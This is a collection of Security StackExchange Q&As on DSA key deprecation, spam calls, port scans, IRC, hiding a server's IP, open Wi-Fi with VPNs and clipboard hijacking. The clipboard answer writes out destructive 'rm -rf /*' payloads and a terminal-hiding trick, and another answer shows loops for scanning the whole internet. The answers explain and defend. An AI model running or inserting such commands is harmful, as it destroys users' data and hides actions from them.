There was a question RSA vs. DSA for SSH authentication keys asking which key is better. Basically all answers were more in a favour of RSA over DSA but didn't really tell that DSA would be somehow insecure. Now however DSA was deprecated by OpenSSH and is later going to be entirely dropped: https://www.gentoo.org/support/news-items/2015-08-13-openssh-weak-keys.html The information states: Starting with the 7.0 release of OpenSSH, support for ssh-dss keys has been disabled by default at runtime due to their inherit weakness. If you rely on these key types, you will have to take corrective action or risk being locked out. Your best option is to generate new keys using strong algos such as rsa or ecdsa or ed25519. RSA keys will give you the greatest portability with other clients/servers while ed25519 will get you the best security with OpenSSH. What makes DSA keys inherently weak?
This is a good question. The dedicated page from OpenSSH only says: OpenSSH 7.0 and greater similarly disables the ssh-dss (DSA) public key algorithm. It too is weak and we recommend against its use. which is no more detailed than the "inherit weakness" from the announce. I did not find any published explanation about these weaknesses except some unsubstantiated weaselling that talks of "recent discoveries". Thus, it is time for some sleuthing. In the source code of OpenSSH-6.9p1 (Ubuntu 15.10 package), for the key generation tool ssh-keygen , I find this remarkable bit of code: maxbits = (type == KEY_DSA) ? OPENSSL_DSA_MAX_MODULUS_BITS : OPENSSL_RSA_MAX_MODULUS_BITS; if (*bitsp > maxbits) fatal("key bits exceeds maximum %d", maxbits); if (type == KEY_DSA && *bitsp != 1024) fatal("DSA keys must be 1024 bits"); The OPENSSL_DSA_MAX_MODULUS_BITS is a constant from OpenSSL's headers, that define it to 10000. So the first four lines check that the requested key size, at generation time, can actually be handled by the key generation process. However, the next two lines basically say: "regardless of the test above, if the key is DSA and the size is not 1024, niet." These 6 lines are, in themselves, a sure sign that whoever developed that code did not completely agree with himself with regards to key sizes. This code was probably assembled incrementally and possibly by different people. The source of the "1024" can be traced to the actual DSA standard (called "DSS" as "Digital Signature Standard"), FIPS 186-4 . That standard was revised several times. In its first version, DSA was mandated to use a modulus whose size was between 512 and 1024 bits (and should be a multiple of 64, presumably to simplify the task for implementers). A later version acknowledged the increases in technological power and mathematical advances, and banned any size other than 1024 bits. The modern version of FIPS 186 (the fourth revision, as of early 2016) allows the modulus to have size 1024, 2048 or 3072 bits. It can thus be surmised that ssh-keygen refuses to use a modulus size different from 1024 bits because someone, at some point, read the then-current FIPS 186 version that mandated exactly that, and nobody bothered to update ssh-keygen when the FIPS standard was amended. Regardless of how this spectacular piece of programming schizophrenia came to be, the raw result is that most if not all SSH keys of type DSA in use today rely on a 1024-bit modulus. The next piece of the puzzle is the Logjam attack . Logjam is basically about noticing that when a client and server agree to use weak crypto, they can be attacked. This is an attack on SSL/TLS, not SSH. However, the Logjam article does not stop at (rightfully) bashing SSL/TLS implementations for using a 512-bit modulus for DH; it also dedicates some talking space to "state-level adversaries". That part mostly says something which was already known, i.e. that breaking discrete logarithm modulo a 1024-bit modulus (something which would allow breaking both DH and DSA) is right now horrifyingly expensive, but not impossible with regards to our current knowledge of the problem and available technology (similar to breaking RSA-1024, and quite unlike breaking a 2048-bit DH or DSA, which are beyond the feasible with current Earth resources). To receptive ears, this all sounded like "OMG we are all pirated by the NSA !" 
and the publicity around the Logjam issue (which is very real) trailed in its wake a substantial amount of hysteria on the subject of 1024-bit DSA keys, including when they are used in SSH. An extra point was that using DSA requires generating, for each signature, a new random value, and the quality of the generation of that value is of paramount importance. Some implementations have failed spectacularly, leading to private key leakage (notably for some "Bitcoin wallets"). This characteristic of DSA is shared with its elliptic-curve version ECDSA. It can be fixed. But it instilled the idea that DSA signatures can be tricky to do properly (and ECDSA signatures equally, but elliptic curves are cool and nobody wants to ban them). These factors, taken all together, explain the ban. This can be viewed as a case of OpenSSH developers being proactive in their notion of security and ready to force users to use strong crypto. Another way of seeing the very same sequence of decisions is that OpenSSH developers blundered badly at some point because of some poor reading of FIPS 186, and then sought to cover it in the equivalent of dumping at sea the corpse of the inconvenient husband. Note that breaking your DSA key would allow the attacker to impersonate you, but not to decrypt recorded sessions. While it can be said that switching to an ECDSA key would be a good idea at some point (it saves a bit of bandwidth and CPU), there is no cryptanalytic urgency to do so. You will still have to do it, because otherwise you may be locked out of your servers because some packager was too zealous in the deprecation policy.
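If you need to replace a deprecated ssh-dss key, a minimal sketch (file paths are just examples) would be:
ssh-keygen -t ed25519 -a 100 -f ~/.ssh/id_ed25519    # Ed25519, supported since OpenSSH 6.5; -a sets KDF rounds for the passphrase
ssh-keygen -t rsa -b 4096 -f ~/.ssh/id_rsa            # or a 4096-bit RSA key for maximum compatibility with older peers
Add the new public key to the relevant authorized_keys files before removing the old DSA key, so you do not lock yourself out.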
{ "source": [ "https://security.stackexchange.com/questions/112802", "https://security.stackexchange.com", "https://security.stackexchange.com/users/34120/" ] }
112,851
Is there an encryption algorithm that is completely secure and isn't based on computationally difficult problems? If such an algorithm exists, why don't we use it in SSL / SSH ?
Yes, it's called One Time Pad , and we don't use it in SSL/TLS because key-exchange is problematic at scale. I will point out that with the rapid decline in the price of various types of storage, One Time Pad's use for smaller communications such as e-mails is more practical now than it ever has been simply because the cost of giving someone something like a large USB Flash Drive with a large "pad" on it didn't exist in a practical sense a few years ago. Still, as the price approaches zero, this becomes trivial to do. As storage costs continue to approach zero, this could become more useful for a wide variety of uses in the future, but the key-exchange problem will still exist.
{ "source": [ "https://security.stackexchange.com/questions/112851", "https://security.stackexchange.com", "https://security.stackexchange.com/users/99334/" ] }
112,905
cnet.com says: Even in Snowden's room, the group took precautions not to be overheard. Greenwald and Poitras would remove the batteries from their mobile phones and put them in refrigerator of Snowden's minibar (...) Is there any security reason they would do that?
With its insulated walls and rubber door seals, a refrigerator is the most soundproof box commonly found in ordinary living spaces. If it's running, even better, it provides white noise. If one was worried about listening devices, then a fridge would be a reasonable and available place to stash them. And Snowden has alleged the NSA can do lots of things even with a phone that's turned off . Minor update: Out of curiosity, I put my phone in the fridge, and later in the freezer, with batteries still inserted. In both cases I was able to call it quite easily - the refrigerator did not act as a Faraday cage - but the ringtone volume was noticeably subdued. So I do think the fridge in the quoted story was a soundproofing issue, not a Faraday Cage as has been suggested. I know it's just an experiment of one, but it was a fun experiment :) Even more minor update: I was curious and checked... my microwave, which is a Faraday Cage, doesn't block cell signals either (good explanation here ).
{ "source": [ "https://security.stackexchange.com/questions/112905", "https://security.stackexchange.com", "https://security.stackexchange.com/users/15648/" ] }
113,064
I sometimes like to check spam just to see what the messages look like, and I found someone who actually put an American phone number (1-XXX-XXX-XXXX). Most of these spammers are either trying to get money out of you, or hack you in ways like disguising themselves as services such as Google+. Not that I actually want to, but I am curious if calling the number would do something to my phone. How could a hacker possibly access sensitive information just by tricking someone into calling? I have heard (no idea where) that some numbers, when called, will charge you an enormous bill. Could this be true?
Can you get "hacked" by calling a number? I am curious if calling the number would do something to my phone. How could a hacker possibly access sensitive information just by tricking someone into calling. It could be a hack, or it could be a prelude to a hack. Here are some rough examples: If you call them, the spammer can find out if that phone number is owned by an actual person. The spammer can also easily fake the same area code as you, and set up a clever social engineering trick that may involve you thinking with the wrong head. If you're dumb enough to call them, you may be gullible enough to fork over additional information. If you're dumb enough, they may call you from other numbers, or forward you to another number. There may also be an exploit in your phone's processing of various messages/content types. While they could easily target all phones at once by using some form of auto-messaging feature, this may be easily stopped by carriers. Learning more about you allows an attacker to guess secret answers, passwords, etc. If you're the gullible type, chances are you don't have a good password policy, or you could be tricked into visiting a malicious website, or both. But why not just send infected videos or pictures to everyone? Let's assume the spammer has developed, or found, a program that helps with automatically dialing phone numbers. If they're sending an infected video or picture to multiple recipients, they may quickly run out of data. It's far cheaper and easier to target people individually, especially those gullible enough to call the number. In fact, if they target everyone, then that also increases the chance of their scam becoming well-known. By limiting their attacks only to the gullible, they've found a very good way to limit detection and knowledge of their particular scam. The reason why they'd want to limit knowledge is that many folks may be searching for a particular scam, not exactly their specific scam. This is a problem with many gullible people: they can't really think outside the box, and not realize it's the same type of scam, but with different features. Your information helps scammers engage in Social Engineering tactics Have you ever tried to contact customer service for anything important, such as banks, online game accounts, websites, etc? Usually, they need specific information from you, or someone pretending to be you, in order to handle your request. In fact, just recently, I was able to social-engineer a customer service representative for an account of mine by providing details on things I knew about me, without actually providing any real concrete details, or even providing my identity. All I needed was a few bits of information about myself. Social Engineering is a tactic used everywhere, and often results in astounding success because people in general are ill-equipped to handle it. If a spammer has your phone number, then it may be possible for them to get other information. Maybe your phone number is tied to different accounts. Maybe they have a partial database of credentials stolen from various websites, which could include more information on you. Maybe that database includes information on your email address , which will allow the scammer to continue their campaign of phishing without you realizing it. Can calling spam numbers cost me money? I have heard (no idea where), that some numbers when called, will charge you an enormous bill. Could this be true? Yes, this is possible. 
If you're calling a premium-rate telephone number , then that could cost you a lot of money when you call them. If you text a number associated with a "donation", whether it's legitimate or a scam, your phone bill will likely include additional charges.
{ "source": [ "https://security.stackexchange.com/questions/113064", "https://security.stackexchange.com", "https://security.stackexchange.com/users/67251/" ] }
113,109
I currently run an Apache HTTP server, and have set up monitoring to receive emails whenever an error appears in the error logs. I get the usual probes trying to find out if I'm using HTTP 1.0, and trying to see if I'm using off-the-shelf software like WordPress that can be exploited. Over the weekend I saw a new entry in my error logs and was wondering what the potential exploiter was trying to do (Abcdef is, I'm guessing, the exploiter's handle; I have changed it): :[DATE] [error] [client XXX.XXX.XXX.XXX] Invalid URI in request HEAD towards the green fields outside. Watch the goats chewing the grass. What is the meaning of life? Life isn't about getting to the end. Goats know this. You should know too. Goats are wise. Goats are cute. Listen to them! This is the message. Love goats, love the Internet! \xf0\x9f\x90\x90 Abcdef. HTTP/1.0 Now apart from obviously telling me about their love for goats, can anyone determine what the aim of this request was? I tried to google part of the string... and just ended up with results about goats! I guess that the idea was to provide a URI which would cause an overflow, resulting in something to do with the unicode at the end, but I am unsure. NOTE: I have made the giant assumption that the request had nefarious intent due to the chars at the end of the request, hence posting on Security rather than Server Fault.
I don't know what the REDACTED part consisted of, but I can tell you that the bytes \xf0\x9f\x90\x90 correspond to a picture of a goat in UTF-8 : Here it is: Note: On a whim, I also looked up the Intel opcodes corresponding to these byte values. They don't do anything interesting at all — 0x90 is NOP (does nothing), 0x9f is LAHF (load FLAGS into AH register), and 0xf0 is LOCK (which will raise an illegal instruction error when followed by LAHF).
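If you want to check the decoding yourself, a quick sketch on any UTF-8 terminal (bash's built-in printf understands \xHH escapes) is:
printf '\xf0\x9f\x90\x90\n'    # prints the goat emoji on a UTF-8 terminal
which simply confirms that the four bytes are one UTF-8 encoded character rather than anything executable.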
{ "source": [ "https://security.stackexchange.com/questions/113109", "https://security.stackexchange.com", "https://security.stackexchange.com/users/99675/" ] }
113,127
My phone number is 456-123-XXXX (American phone number + area code). Over the past few months I get fairly regular spam calls from other numbers also beginning with 456-123-XXXX, where the last four digits are always different. The calls are clearly spam, telling me I won a trip and then asking for my credit card number. After getting one such call, I ignored it and called the number back. The guy that answered seemed genuinely confused and said he hadn't called me. I warned him that his number was likely being used for spam. I've already called my carrier, but the operator who answered seemed totally confused and basically just suggested I change my number, which I really don't want to do. My number is attached to a cell phone, although when I originally got it 15 years ago it was a landline. So... what do I do? Also, I'm curious as to what's actually happening... as well as if my number is also being used to spam other people.
The telephone system has been designed so that a caller can replace their phone number with a fake, and some unscrupulous companies use this to change their number to appear to be local to the person they are calling. They aren't using specific numbers of people you know, just something picked at random. The thinking is that a person is more likely to pick up if they think it's a local call. It is illegal to spoof your number with intent to defraud in the US and Canada, so what they are doing is probably against the law. You could report this to the phone company and they may look into it. Other than that you can't do much about this unless your phone company offers an add-on service to prevent it.
{ "source": [ "https://security.stackexchange.com/questions/113127", "https://security.stackexchange.com", "https://security.stackexchange.com/users/99688/" ] }
113,172
This morning I was looking through firewall logs and saw there were about 500 packets marked as a port scan. The scanned ranges were 1000-1200 and 5000-5200. The IP address is 85.25.217.47, which seems to be somewhere in Germany, and these guys scan our ports on a regular basis. The packets were all dropped by the firewall (a Sophos SG125). What I normally do is just add the IP range to our blocking list so next time it gets dropped by a specific rule. How do you guys deal with port scan attacks?
I ignore them. And if you have a reasonable security posture, you should too. Your servers should have no ports open to the general public other than those that you use to serve the general public. For example, your web server should have ports 80, 443, and maybe 22 open; everything else should be SSH-tunneled or otherwise VPN'ed if you need to connect to it, unless you expect random nobodies on the Internet to be using the listening service. Perhaps you may want to remap SSH to port 222 or something in the upper range to avoid filling your auth logs with failed logins, and that should be as exciting as your servers get. If instead the port scan is hitting your outbound corp gateway, then the scan should show zero ports open, because your corp gateway isn't a server. And you, like a wise IT admin, run all your servers elsewhere on the internet, not inside your corp network, for a whole raft of reasons I won't go into here. A port scan should reveal to the attacker nothing that they couldn't reasonably guess. And if this is not the case, then your problem isn't the port scan, it's the public secrets you're trying to hide by blocking port scans.
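If you do decide to move SSH off the default port just to cut down log noise, the change is a single illustrative line in /etc/ssh/sshd_config, followed by a restart of the SSH daemon (the service name varies by distribution):
Port 222
This is purely a noise-reduction measure, not a security control; a scanner that checks all ports will still find it.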
{ "source": [ "https://security.stackexchange.com/questions/113172", "https://security.stackexchange.com", "https://security.stackexchange.com/users/99743/" ] }
113,267
I am researching whether I can host multiple domains on one server over HTTPS when each domain has a different certificate. In this case, I would need to know the domain of the incoming connection, so: in that first part of the SSL handshake, will I have the information I need to send back the correct certificate for that domain?
Yes, as long as the server and the clients support the Server-Name-Indication (or SNI) extension. This extension allows for virtual hosting for HTTPS, where you have multiple independent domains and certifications bound to a single IP address. Most clients these days do support SNI. The place where you might have issues is if you have older clients using platforms like Windows XP, old versions of Android, or Java 6.
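To check which certificate a server hands out for a given name, a quick sketch with openssl (the host name and IP here are placeholders) is:
openssl s_client -connect 203.0.113.10:443 -servername example.com </dev/null | openssl x509 -noout -subject -issuer
Running it with and without the -servername option shows whether the server is actually switching certificates based on SNI.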
{ "source": [ "https://security.stackexchange.com/questions/113267", "https://security.stackexchange.com", "https://security.stackexchange.com/users/18162/" ] }
113,288
In an answer to How do you deal with massive port scans? , user tylerl said: ... And you, like a wise IT admin, run all your servers elsewhere on the internet, not inside your corp network, for a whole raft of reasons I won't go into here As a not-so-wise IT admin, what reasons are these?
Having all your corporate servers in the same network is a bad idea because if one of the servers is compromised, the attacker can easily spread out to the others . Servers are often configured to be secure on the front end, but when it comes to servers communicating with each other, there are various ways to find vulnerabilities. Also the sensitivity of data is often not the same. While a web server is important for the availability, a database server often contains valuable customer data. Separating these is a good idea in any case. Specialized hosting providers for specific servers are mostly able to keep their servers more secure as well. Thanks to the internet, there is no reason not to separate servers, unless your application is so time dependent that for example database servers need to be accessed directly.
{ "source": [ "https://security.stackexchange.com/questions/113288", "https://security.stackexchange.com", "https://security.stackexchange.com/users/52211/" ] }
113,456
I've set up a site on Digital Ocean without a domain yet, so there is only the IP. Despite telling no-one of its existence or advertising it, I get hundreds of notices from fail2ban that various IP's are trying to hack my SSL port or are looking for PHP files. But how do they know that I do exist? Where do they get the IP from?
You can't hide your IP address on the internet. They aren't secret. Pretty much what @DeerHunter said. It's trivial to scan the entire internet. If they want, they can target all known Digital Ocean droplets that are online. They can do this on a timer so that when you go offline, or online, it will just keep trying, as those may be high-value targets that could become vulnerable at a moment's notice. Let me give you a very rough coding example. Let's pretend your IP address is 104.16.25.255. Let's get the IP address of www.digitalocean.com so we can easily check for associated IP addresses. www.digitalocean.com returns 104.16.25.4. Let's scan everything: 104.16.25.* Scanning is incredibly easy from a programming standpoint. Let's assume we want to try and find all nearby associated IP addresses. Assume programs can handle numbers and patterns very well. Here's an example of an integer being incremented: i++; This increments the current value of i by 1. Let's assume i starts off as 1. After i++, you'll get 2. Check out this painfully simple loop: for (int i = 1; i < 256; i++) { scanIpAddress("104.16.25." + i); } An alternative one-line bash variant would be as follows: for ip in `seq 1 255`; do scan_thingy_command 104.16.25.$ip --options -oG lol.txt; done You just scanned 104.16.25.1, and i changed from 1 to 2. As the whole loop continues, it will go from 104.16.25.1 to 104.16.25.255. I don't have time to scan and look right now; however, it's possible that this tiny block doesn't just belong to digitalocean. To find more targets on DigitalOcean, a programmer may change the numbers even more. For example, introduce another loop that nests the aforementioned loop on the inside, and add j: scanIpAddress("104.16." + j + "." + i); This will allow them to scan 104.16.1-255.1-255. From there, they can keep going backwards and nesting for loops until they get the entire internet. There are other, more efficient ways to do this, such as masscan (a rough sketch is given at the end of this answer), but this is the most basic way. Again, this could also be done on the command line with one line: for oct1 in `seq 1 255`; do for oct2 in `seq 1 255`; do for oct3 in `seq 1 255`; do for oct4 in `seq 1 255`; do scan $oct1.$oct2.$oct3.$oct4 --stuff; done; done; done; done Other methods The above example was a really rough example. They may be doing more, their code might be different, and they may be using entirely different methods and/or programs. However, the concept is pretty much the same. It's also possible that the programs in question are just targeting everyone en masse. So how can I hide my stuff online? If it's online, whatever you are hiding, they will find it... or try to find it. However, depending on your web server, you can try HTTP access controls such as .htaccess. If you're using access controls - again, this depends on your web server - then it's likely that you'll be able to prevent others from viewing/accessing pages. That won't protect you against non-website login attempts, though. And if you're denying them access to non-existent webpages, they now know you're really online, and can focus their attacks more easily! However, it's still good practice. Here's an example .htaccess deny for Apache (2.4 and later): Require ip 192.168.1.100 In the above example, you're denying everyone access to that folder, except your IP address. Keep in mind, 192.168.1.100 is a local IP address. You'll have to replace that with your public IP address.
Also, keep in mind that if your attacker is running a proxy/VPN on your machine, they can still access those pages. If your attacker already has access to the website, they can either edit the .htaccess or remove it. Nothing's 100%. Just don't put anything online if you aren't ready to be scanned. Everyone has a plan until they get port-scanned in the mouth.
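As a concrete illustration of the "more efficient ways" mentioned above, a masscan invocation of roughly this shape (the range and rate are arbitrary examples) sweeps a large block for a few ports very quickly:
masscan 104.16.0.0/12 -p22,80,443 --rate 10000
The point is simply that sweeping whole provider ranges is cheap, so an unadvertised IP address offers no protection at all.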
{ "source": [ "https://security.stackexchange.com/questions/113456", "https://security.stackexchange.com", "https://security.stackexchange.com/users/90321/" ] }
113,532
What is so special about IRC that hackers use it for online meetings, ignoring every other option, like messengers or social media? It seems to be so secure that it gets used to send commands to victims' computers instead of just sending them directly (that's called a "botnet", right?)
In addition to Rory's points... Internet Relay Chat is actually incredibly insecure I don't think IRC is in any way secure by default. Almost all servers utilize communication through plaintext. Your ISP can snoop on the contents easily. All of your messages, in general, are unencrypted. You have to install addons to enable encrypted communications, if they're even done right. Even if the server itself encrypted the messages/uses SSL, it's a moot point: everyone can connect and read what you're saying unless you encrypted it on your end. IRC admins can read your private messages as well. The vast majority of servers I've visited also expose your IP Address to everyone unless you're behind a proxy or VPN, so there's no real anonymity. Even the ones that partially mask your IP will show part of where you are. For example: Random432342.hsd1.ca.comcast.net . While other servers will block everything, all IRCops/admins know the real IP you're connecting from. What's to stop them from cooperating with law enforcement? Your IRC client could also be vulnerable to buffer overflow attacks / string formatting vulnerabilities / etc. Or maybe you'll just click on a drive-by-download link... Does true anonymity exist on IRC? Some people have a different definition of anonymity than me. Rory's definition is correct in the context of being anonymous to most people , but that's not the definition I subscribe to. For me, anonymity is being anonymous to everyone , no matter what. How do you think people keep getting busted even though they're "behind 7 proxies" ? If you're behind a proxy/vpn, you're still communicating with the IRC server. Your proxy/VPN is connected to that IRC server, and you are connected to that proxy/vpn server at a specific time . Once you send text, whether it's encrypted or not, all law enforcement really needs to do is line up timestamps, even if it's encrypted. Lag delay? Yeah, that's very easy to account for. Soon, a very clear pattern will emerge, and your entire proxy/VPN chain will be quickly unraveled to the source. How can they do that? XKeyscore , Prism . Right now, true anonymity doesn't really exist on IRC. But Mark Buffalo, I've never been caught! They either don't care about you because you're a small fry who doesn't matter, or they're slowly building up a case to get you on maximum charges. Or you're simply out of their jurisdiction, but they're still ready to pounce. Maybe this "security" is actually a jurisdiction issue? I think part of the confusion here is jurisdiction. Jurisdiction can offer tremendous security if there's a refusal to co-operate. This is why many criminals may still be around after "getting caught." If you're in another country which refuses to cooperate with the law enforcement of another country, you might be safe from prosecution, but you'll probably still be indicted on charges . So as long as you never enter that country...
{ "source": [ "https://security.stackexchange.com/questions/113532", "https://security.stackexchange.com", "https://security.stackexchange.com/users/31356/" ] }
113,627
Like all beginners in the land of Linux, I usually look for websites that contain some useful shell commands, select the command with my mouse, copy it ( CTRL + C ) and paste it into a terminal. For example, if I need to install package_name.deb: sudo apt-get install package_name.deb I will give my root password and install package_name.deb. But when I paste this command into my text editor, it turns out to be something like: sudo apt-get install package_name.deb && apt-get install suspicious_file.deb Second example: if I want to add a new PPA (terminal): sudo add-apt-repository ppa:some/ppa sudo apt-get update When I edit my sources.list, I will find something like: deb http://ppa.launchpad.net/some-ppa/ and deb http://ppa.launchpad.net/a_suspicious_some-ppa/ The problem is that the second PPA, deb http://ppa.launchpad.net/a_suspicious_some-ppa/ , is added automatically and without my permission. As you can see, there is an invisible part. It does not appear in my terminal. What is the risk of copying and pasting from an untrusted website into the terminal, and how do I fix my operating system?
Websites can append to your clipboard The risk is exactly what you said it was. It's definitely possible to append malicious commands to the clipboard. You could even append && rm -rf /* (only executes if the first command was successful), or ; rm -rf /* (executes even if the first command was unsuccessful) and brick certain UEFI devices . You should also check out Michael's post in this thread for another example . In the end, it really depends on how creative and malicious a particular evil "hacker" is. But how can you make the commands "invisible" in the terminal? Method one: echo test;echo insert evil here;clear;echo installing package Execution order : Echo "test" happens Echo "insert evil here" happens Actions are "cleared" Intended action happens here, but you don't see the rest. ... You can try to scroll up in the terminal window to find the rest of it. Method two uses the commands stty -echo and tput smcup. This will stop the terminal from showing what is being typed, so it doesn't appear in the terminal window at all. You can try it like this: stty -echo;tput smcup;echo evil commands expected command Those are just two really rough examples, but they show the potential of what can be done to obfuscate commands. Note that this likely doesn't hide anything from ~/.bash_history unless the hidden commands specifically delete/modify its contents. You should assume that there are other ways to do this. Mitigation I recommend using an addon to disable clipboard manipulation. There are unfortunately ways to get around that, so I'd recommend pasting everything into a GUI text editor before it goes into your terminal, or anywhere else. You need to verify what you're doing. If you don't understand each individual command, you should google it. This is proper tinfoil hattery, because copying and pasting can force the commands to auto-execute on many Linux flavors. Repairing your Linux installation You might not have any idea how deep the rabbit hole goes. Unless you have the time and effort to put into it, I'd suggest you just nuke from orbit, unless you have important files. If you have important files, just back up the non-executable stuff (no pdfs, documents, etc), and then nuke from orbit. If you have PDFs, you can convert the PDF to PostScript, or copy and paste the contents into a text file. With documents, copy and paste the text and format it later.
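A further mitigation worth knowing about, assuming a reasonably recent shell (bash 4.4+/readline 7.0+): enabling bracketed paste makes the shell treat a paste as inert text instead of immediately executing any embedded newlines, so you get a chance to read the pasted commands before pressing Enter yourself:
echo 'set enable-bracketed-paste on' >> ~/.inputrc
This does not protect against everything (and is already the default in some newer shells), but it blunts the simple "hidden newline auto-executes the command" trick.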
{ "source": [ "https://security.stackexchange.com/questions/113627", "https://security.stackexchange.com", "https://security.stackexchange.com/users/98440/" ] }
114,633
I recently started server-side programming, and wrote up a page containing a drawable-canvas that lets users publically draw and save a picture, and overwrite pictures made by others. For kicks, I thought of advertising the link on social media to see what happens. I'd rather not put my computer in harm's way though just for kicks. My main concerns are someone being able to access the rest of my system, or being able to delete files off the site. Are either of these a concern? Quick information about the setup: I'm using XAMPP 7.0.1 on Windows 10 Home. Besides putting a password on my MySQL server, I really haven't done anything security oriented, so it could be considered in an "out-of-the-box" state as far as security is concerned. It uses a MySQL database and PHP's MySQLi library, but as mentioned above, I have it password protected, and have taken care to prevent injection.
Oh my. YES! All those things are of a concern. You only expose your server publicly if you are prepared to have that server taken over by a malicious party. All one needs to do is to find a misconfiguration or a security hole and they can own your personal computer that you use to do things like access personal accounts (email, banks, etc.). Public servers need to be locked down, with only the info it needs to provide a service. Best case is to have that server backed up and disposable in case it is compromised. If something bad happens, you blow it away and restore from back ups. Do not expose your personal computer to the public in this way, especially when you are exposing custom code and you do not understand how exploitable it is.
{ "source": [ "https://security.stackexchange.com/questions/114633", "https://security.stackexchange.com", "https://security.stackexchange.com/users/82973/" ] }
114,721
This page on server hardening claims: Disabling the root account is necessary for security reasons. Why is disabling the root account necessary for security reasons?
If you're not using Root, you're using sudo! Sudo is a great way to become root only when you need to. Root is a giant target. What's root's username? Root! I'm so smart :) Logging. Sudo has a greater command of audit logging (so that when someone uses sudo to do something silly, you can tattle on them to the central logging server). This is helpful for forensic analysis in some cases. Granular permissions. Root is a Big Flippin' Hammer. Do not hand BFHs to your users. Sudo allows you to specify that a user can run update commands like aptitude without a password, but everything else is off limits (see the sketch after this answer)! You can't do that with the BFH that is root. It allows you the flexibility of sanctioning certain commands for users, but disallowing others. This allows you to build a security policy that does not require an administrator to physically log in to a machine every time a machine needs to be updated (or another menial task). Idiot-proofing. Why do you not hand users a BFH? Because they're dumb. Why do I use sudo instead of root? I'm dumb. Dumb means mistakes, and mistakes mean security holes and sysadmin-issues.
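For illustration, a granular sudoers rule of the kind described above might look like this (edit with visudo; the account name "deploy" and the exact commands are just examples):
deploy ALL=(root) NOPASSWD: /usr/bin/apt-get update, /usr/bin/apt-get upgrade
That user can refresh and apply package updates as root and nothing else, and every invocation still goes through sudo's logging.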
{ "source": [ "https://security.stackexchange.com/questions/114721", "https://security.stackexchange.com", "https://security.stackexchange.com/users/11902/" ] }
114,762
There are many open Wi-Fi hotspots scattered around from cafes to airports. I understand that a non-passworded Wi-Fi leaves traffic unencrypted and therefore available for hackers to read. I also know about a man-in-the-middle attack where the Wi-Fi hotspot is malicious. I therefore always use a VPN connection to encrypt my traffic while using open Wi-Fi hotspots to avoid these attacks. But the article Even with a VPN, open Wi-Fi exposes users states that even with a VPN connection, an open Wi-Fi hotspot is still insecure. It states: In this period before your VPN takes over, what might be exposed depends on what software you run. Do you use a POP3 or IMAP e-mail client? If they check automatically, that traffic is out in the clear for all to see, including potentially the login credentials. Other programs, like instant messaging client, may try to log on. But at the same time the article feels like a disguised advert concluding with (what feels like) a sales pitch for something called Passpoint which I have never heard of: The Wi-Fi Alliance has had a solution for this problem nearly in place for years, called Passpoint . Can an open Wi-Fi hotspot be considered secure when using a VPN connection or should you NEVER use open hotspots?
This is actually exactly the type of environment VPNs were designed to work in: when you cannot trust the local network. If set up properly (i.e. making sure all traffic goes through the VPN and using a secure mutual authentication scheme) it will pretty well protect your connection. This, however, requires the whole thing to be designed properly. Obviously, your VPN must be set up so that ALL your communication goes through the encrypted channel, not just the part that is aimed at the internal network behind it (which is sometimes the case with corporate firewalls or if you're using SSH). Avoid using SSL VPN unless you're using a pinned certificate for the server: you'll want to avoid having to perform PKI validation of the server's host name since it can be rather delicate. Understand the limitation: you will not be able to "mask" the fact that you're using a VPN, you will not mask the volume and pattern of your exchange (which can be to some extent used to identify the type of service you're using) and your connection will ONLY be secure up to the VPN exit point: everything between that point and the destination server will not be protected by the VPN (although it can also be encrypted on its own). There is no guarantee against a state actor who would be willing to spend dedicated resources to penetrate your security.
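If you use OpenVPN, the "make sure all traffic goes through the VPN" part is typically a client-side directive along these lines (a sketch, not a complete config):
redirect-gateway def1      # route all IPv4 traffic through the tunnel
block-outside-dns          # Windows clients only: stop DNS queries leaking around the tunnel
After connecting, you can sanity-check with something like ip route on Linux to confirm the default route points at the tunnel interface rather than the untrusted Wi-Fi gateway.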
{ "source": [ "https://security.stackexchange.com/questions/114762", "https://security.stackexchange.com", "https://security.stackexchange.com/users/87457/" ] }
114,897
Apple released an open letter to the public outlining their reasons for not complying with the FBI's demands to modify the iPhone's security mechanism. Here's a summary: The FBI has an iPhone in their possession which they would like to access data from. The phone is locked and fully encrypted. After failing to get into the phone, the FBI asked Apple to unlock the phone. Apple said since the phone is encrypted, they can't get into it either. The FBI asked Apple to modify the iPhone OS to enable brute force password attempts electronically. (Currently the passwords can only be entered in via the manual interface, and is limited to 10 attempts.) Apple refused. They believe it would be too dangerous to make that change because in the wrong hands it would undermine the security of all iPhone users, even if they only used the software in this instance. I understand Apple's position of not wanting to make the change, particularly for new phones, but it's unclear whether the change could actually be made and installed on an existing locked and encrypted phone. Could they actually accomplish this for an existing encrypted phone? If yes, then isn't simply knowing this is possible also undermining the security? It seems to me it would be just one step removed from the backdoor they are trying to keep closed. Update : since this is a security forum, I feel it is important to point out that Apple is using the word backdoor differently than we typically do on this site. What the FBI has asked Apple to do would not result in a backdoor by the typical definition that we use, which is something akin to a master key. Instead, in this case, if Apple were to comply, the FBI would then be able to attempt to brute force the passcode on the phone. The strength of the passcode would determine whether they are successful in gaining access. Based on Dan Guido's article (linked to in Matthew's answer), if each passcode try takes 80ms, then the time needed to brute force the passcode would take, on average (by my calculations): 4 digit numerical passcode: about 7 minutes 6 digit numerical passcode: about 11 hours 6 character case-sensitive alphanumerical passcode: 72 years 10 character case-sensitive alphanumerical passcode: 1 billion years Obviously if a 4 or 6 digit numerical passcode was used, then the brute force method is basically guaranteed to succeed, which would be similar to a backdoor . But if a hard passcode is used, then the method should probably be called something other than a backdoor since gaining access is not guaranteed, or even likely. Update 2 : Some experts have suggested that it is theoretically possible for the FBI to use special tools to extract the device ID from the phone. Having that plus some determination and it should be possible to brute force the pin of the phone offline without Apple's assistance. Whether this is practically possible without destroying the phone remains to be seen, but it is interesting to note that if it can be done, the numbers I mentioned in the above update become meaningless since offline tools could test passcodes much faster than 80ms per try. I do believe that simply knowing this is possible, or even knowing that Apple can install new firmware to brute force the passcode more quickly, does imply a slightly lessened sense of security for all users. I believe this to be true whether Apple chooses to comply with the order or not. There are multiple excellent answers here, and it's very difficult to choose which one is best, but alas, there can be only one. 
